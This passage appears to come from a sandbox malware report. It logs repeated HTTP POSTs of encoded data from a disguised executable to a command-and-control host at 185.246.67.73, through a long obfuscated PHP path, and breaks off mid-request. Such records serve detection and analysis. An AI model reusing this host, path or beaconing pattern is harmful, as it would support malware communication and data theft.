                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                       Dec 8, 2024 15:28:24.638345003 CET | 2584 | OUT | Data Raw: [binary request body, hex dump omitted]
                                                                                                                       Dec 8, 2024 15:28:26.934431076 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                       Dec 8, 2024 15:28:27.168299913 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:26 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                       Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 49863 | Destination IP: 185.246.67.73 | Destination Port: 80 | PID: 8028 | Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                       Dec 8, 2024 15:28:27.409579039 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                       Dec 8, 2024 15:28:27.764698029 CET | 2584 | OUT | Data Raw: [binary request body, hex dump omitted]
                                                                                                                       Dec 8, 2024 15:28:28.752886057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                       Dec 8, 2024 15:28:28.992626905 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:28 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                       Session ID: 49 | Source IP: 192.168.2.4 | Source Port: 49869 | Destination IP: 185.246.67.73 | Destination Port: 80 | PID: 8028 | Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                       Dec 8, 2024 15:28:29.240799904 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                       Dec 8, 2024 15:28:29.591556072 CET | 2584 | OUT | Data Raw: [binary request body, hex dump omitted]
                                                                                                                       Dec 8, 2024 15:28:30.578612089 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                       Dec 8, 2024 15:28:30.813620090 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:30 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                       Session ID: 50 | Source IP: 192.168.2.4 | Source Port: 49875 | Destination IP: 185.246.67.73 | Destination Port: 80 | PID: 8028 | Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                       Dec 8, 2024 15:28:30.933264971 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:31.279798985 CET1904OUTData Raw: 50 59 43 53 5b 42 55 57 54 5e 50 59 5b 5c 59 5f 59 58 59 59 57 55 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PYCS[BUWT^PY[\Y_YXYYWUQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$["29&!3:546,^#0>_21&_#(/; ]!![ 0
                                                                                                                      Dec 8, 2024 15:28:32.343777895 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:32.576565981 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:32 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 1f 31 43 23 1e 3d 04 31 05 32 3f 3f 59 24 16 2f 18 2b 20 2c 04 24 5f 24 5c 38 3a 23 54 37 05 23 06 25 3d 05 00 35 3c 0d 51 2e 02 20 5a 06 10 21 5d 31 2f 01 58 3c 05 2a 05 25 06 25 42 36 24 3b 40 25 3d 2f 52 29 3a 36 5d 23 01 2b 11 27 3d 22 0a 2e 35 04 5c 27 23 37 55 27 36 2c 55 0f 1f 25 0b 27 22 3c 0a 22 37 36 56 35 20 0a 04 32 1c 39 08 36 01 2c 18 28 13 28 5b 28 32 24 5a 22 21 2c 06 39 28 31 5e 2a 31 24 08 24 3c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 91C#=12??Y$/+ ,$_$\8:#T7#%=5<Q. Z!]1/X<*%%B6$;@%=/R):6]#+'=".5\'#7U'6,U%'"<"76V5 296,(([(2$Z"!,9(1^*1$$< S*.T3VR


Session ID: 51
Source: 192.168.2.4:49876  Destination: 185.246.67.73:80  PID: 8028
Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:31.050756931 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
  Host: 185.246.67.73
  Content-Length: 2584
  Expect: 100-continue
  Connection: Keep-Alive
Dec 8, 2024 15:28:31.403992891 CET | 2584 | OUT | Data Raw: 55 5f 43 54 5b 47 55 54 54 5e 50 59 5b 5d 59 5d 59 59 59 5b 57 51 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
  Data Ascii: U_CT[GUTT^PY[]Y]YYY[WQQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3[-Z%X!!9'5486/^/'./201&*^ Z<;+ ]!![ 4
Dec 8, 2024 15:28:32.369805098 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:32.608395100 CET | 207 | IN | HTTP/1.1 200 OK
  Date: Sun, 08 Dec 2024 14:28:32 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Length: 4
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
  Data Raw: 34 5b 40 58
  Data Ascii: 4[@X


Session ID: 52
Source: 192.168.2.4:49881  Destination: 185.246.67.73:80  PID: 8028
Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:32.846945047 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
  Host: 185.246.67.73
  Content-Length: 2576
  Expect: 100-continue
Dec 8, 2024 15:28:33.200897932 CET | 2576 | OUT | Data Raw: 50 5f 43 56 5b 44 55 51 54 5e 50 59 5b 58 59 5b 59 54 59 59 57 53 51 58 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
  Data Ascii: P_CV[DUQT^PY[XY[YTYYWSQXYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.3=%Z#0)Z:B6]#8:Y,(V$=;&)12\ /8 ]!![
Dec 8, 2024 15:28:34.203406096 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:34.442789078 CET | 151 | IN | HTTP/1.1 200 OK
  Date: Sun, 08 Dec 2024 14:28:33 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Length: 4
  Content-Type: text/html; charset=UTF-8
  Data Raw: 34 5b 40 58
  Data Ascii: 4[@X


Session ID: 53
Source: 192.168.2.4:49883  Destination: 185.246.67.73:80  PID: 8028
Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:34.674662113 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
  Host: 185.246.67.73
  Content-Length: 2584
  Expect: 100-continue
  Connection: Keep-Alive
Dec 8, 2024 15:28:35.028986931 CET | 2584 | OUT | Data Raw: 50 58 46 57 5b 43 55 50 54 5e 50 59 5b 5d 59 52 59 58 59 5d 57 55 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
  Data Ascii: PXFW[CUPT^PY[]YRYXY]WUQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.^'Y%*)!29$:4=8^<S$-8Y&V6_%;"X#<, ]!![ 4
Dec 8, 2024 15:28:36.024429083 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:36.256392956 CET | 207 | IN | HTTP/1.1 200 OK
  Date: Sun, 08 Dec 2024 14:28:35 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Length: 4
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
  Data Raw: 34 5b 40 58
  Data Ascii: 4[@X


Session ID: 54
Source: 192.168.2.4:49889  Destination: 185.246.67.73:80  PID: 8028
Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:36.496345043 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
  Host: 185.246.67.73
  Content-Length: 2584
  Expect: 100-continue
  Connection: Keep-Alive
Dec 8, 2024 15:28:36.841520071 CET | 2584 | OUT | Data Raw: 55 59 46 50 5e 45 50 54 54 5e 50 59 5b 51 59 5d 59 5d 59 56 57 5c 51 58 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
  Data Ascii: UYFP^EPTT^PY[QY]Y]YVW\QXYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.'=5X$)&!>.! 58,0.+' Y1;>X",.; ]!![


Session ID: 55
Source: 192.168.2.4:49895  Destination: 185.246.67.73:80  PID: 8028
Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:37.717827082 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
  Host: 185.246.67.73
  Content-Length: 1904
  Expect: 100-continue
  Connection: Keep-Alive
Dec 8, 2024 15:28:38.075958014 CET | 1904 | OUT | Data Raw: 50 5a 43 5d 5e 47 55 51 54 5e 50 59 5b 5d 59 53 59 58 59 57 57 5d 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
  Data Ascii: PZC]^GUQT^PY[]YSYXYWW]Q]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'-1)>5*.76\#(>X.8$T'=?&)'+144; ]!![ 4
Dec 8, 2024 15:28:39.035151005 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:39.268614054 CET | 380 | IN | HTTP/1.1 200 OK
  Date: Sun, 08 Dec 2024 14:28:38 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Vary: Accept-Encoding
  Content-Length: 152
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
  Data Raw: 06 13 3a 09 25 43 37 55 3d 2a 2a 5c 25 3c 2c 07 30 06 23 5b 29 1e 09 5a 24 29 3c 19 2f 3a 24 0d 23 12 01 07 33 3d 20 5d 35 3c 20 0a 2d 12 20 5a 06 10 21 5e 24 2f 34 00 2b 05 2d 5c 26 28 3d 45 35 19 2b 07 24 03 05 55 3f 2a 2d 03 34 06 37 57 32 04 29 56 3a 25 31 04 32 20 2b 50 27 36 2c 55 0f 1f 25 0b 30 0b 23 53 23 0e 25 0f 20 33 3b 5c 32 1b 2a 1a 35 01 3c 18 28 3e 24 5e 3f 0b 27 03 20 0c 27 5e 2c 28 3a 06 2a 31 37 57 30 3c 20 53 2a 02 2e 54 0d 33 56 52
  Data Ascii: :%C7U=**\%<,0#[)Z$)</:$#3= ]5< - Z!^$/4+-\&(=E5+$U?*-47W2)V:%12 +P'6,U%0#S#% 3;\2*5<(>$^?' '^,(:*17W0< S*.T3VR


Session ID: 56
Source: 192.168.2.4:49896  Destination: 185.246.67.73:80  PID: 8028
Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:37.837368011 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
  Host: 185.246.67.73
  Content-Length: 2584
  Expect: 100-continue
  Connection: Keep-Alive
Dec 8, 2024 15:28:38.185285091 CET | 2584 | OUT | Data Raw: 50 53 43 55 5b 48 50 54 54 5e 50 59 5b 5e 59 5b 59 54 59 5c 57 51 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
  Data Ascii: PSCU[HPTT^PY[^Y[YTY\WQQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.[$=6$)-!U"94%7;%,30.('0&8:]"<,; ]!![ 8
Dec 8, 2024 15:28:39.168108940 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:39.400542021 CET | 207 | IN | HTTP/1.1 200 OK
  Date: Sun, 08 Dec 2024 14:28:38 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Length: 4
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
  Data Raw: 34 5b 40 58
  Data Ascii: 4[@X


Session ID: 57
Source: 192.168.2.4:49902  Destination: 185.246.67.73:80  PID: 8028
Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:39.642569065 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
  Host: 185.246.67.73
  Content-Length: 2584
  Expect: 100-continue
Dec 8, 2024 15:28:39.997936964 CET | 2584 | OUT | Data Raw: 55 59 46 51 5e 42 55 52 54 5e 50 59 5b 51 59 5d 59 5e 59 5e 57 53 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
  Data Ascii: UYFQ^BURT^PY[QY]Y^Y^WSQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$5[%9[6 >:"\"8).;#'>'&V.]1:_"/7_;; ]!![
Dec 8, 2024 15:28:40.965383053 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:41.200793028 CET | 151 | IN | HTTP/1.1 200 OK
  Date: Sun, 08 Dec 2024 14:28:40 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Length: 4
  Content-Type: text/html; charset=UTF-8
  Data Raw: 34 5b 40 58
  Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49908 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:41.444286108 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:28:41.794598103 CET | 2584 | OUT | Data Raw: 50 5e 43 56 5b 46 55 56 54 5e 50 59 5b 5c 59 5a 59 54 59 58 57 54 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: P^CV[FUVT^PY[\YZYTYXWTQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3[=[&_)50*-$:] 8X/ 0>20"X&(>\"<7;+ ]!![ 0
Dec 8, 2024 15:28:42.768253088 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:43.000971079 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:28:42 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49909 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:43.237008095 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2580
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:28:43.591629028 CET | 2580 | OUT | Data Raw: 50 53 46 51 5e 45 55 52 54 5e 50 59 5b 58 59 5e 59 5e 59 56 57 52 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: PSFQ^EURT^PY[XY^Y^YVWRQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'..$).!3",'& :^,<%.8%5%1 <'\/ ]!![ 4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49915 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:44.401792049 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
